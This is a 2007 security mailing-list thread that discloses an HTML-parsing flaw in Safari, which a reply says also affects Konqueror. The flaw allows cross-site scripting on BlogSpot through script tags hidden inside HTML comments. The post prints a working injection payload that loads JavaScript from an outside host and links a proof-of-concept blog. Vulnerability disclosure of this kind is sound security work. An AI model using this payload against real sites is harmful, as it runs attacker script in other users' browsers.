Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jan 23 2007 07:44AM
Jose Avila III (jose onzra com) (1 replies)
Re: Safari Improperly Parses HTML Documents & BlogSpot XSS vulnerability Jan 24 2007 05:06AM
Robert Tasarz (robert tasarz greentech pl)
Jose Avila III wrote:
> Overview:
>
> Safari on occasions may improperly parse the source of an HTML document,
> which can lead to the execution of html tags within comments. This can
> become dangerous when input filters allow html tags within comments, as
> they will get parsed and executed under certain circumstances.
>
> Details:
>
> In some cases you can cause Apple?s Safari browser to execute code when
> it should not be executed. In the following example everything within
> the comment, in theory should never be executed; however, safari decides
> to execute the script tag.
>
> <title>myblog<!--</title></head><body><script
> src=http://beanfuzz.com/bean.js> --></title>
>
> Blogs hosted on BlogSpot.com have filter mechanisms for their input;
> however, they will allow you to inject anything within comments. This
> made it possible to cross site script blogspot.com. Note: Only Safari
> viewers will be affected.
>
> Proof of concept: http://dirtybean1234.blogspot.com/
>
> Initial release of vulnerability: http://www.beanfuzz.com/wordpress/?p=99
>
> Vendor Response:
>
> I was unable to get a response from the vendor in regards to this issue
>
> Questions / Comments:
> Jose (at) onzra (dot) com
>

As could be expected, the same problem exists in Konqueror (tested
v.3.5.5 on Debian GNU/Linux Sid).

regards,
Robert Tasarz

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus